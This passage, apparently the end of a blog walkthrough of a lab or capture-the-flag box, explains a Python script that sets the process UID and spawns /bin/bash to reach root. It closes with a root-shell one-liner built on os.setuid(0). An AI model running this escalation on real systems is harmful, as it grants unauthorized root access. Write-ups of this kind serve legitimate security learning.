setuid = int(input("Enter an SUID: "))
print("Attempting to set UID")
try:
     os.setuid(setuid);
     print("Success")
     os.system("/bin/bash");
except:
      print("An error occurred, sorry")

Breaking this down we import the "os" module, we set a variable called "uid" which gets the current UID it then prints "Your current SUID is" then parses that variable.

It then creates another variable called "setuid" which takes an input for the UID they want to set, it then prints attempting to set UID. It then tries to set the uid and parses the users input and then it prints success and spawns a bin bash shell and if it cannot set that UID it'll print an error occurred.

image.png

I am now root! The one liner is simply:

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

I hope you enjoyed this detailed writeup.

A Twitter follow is always appreciated.

 
Share this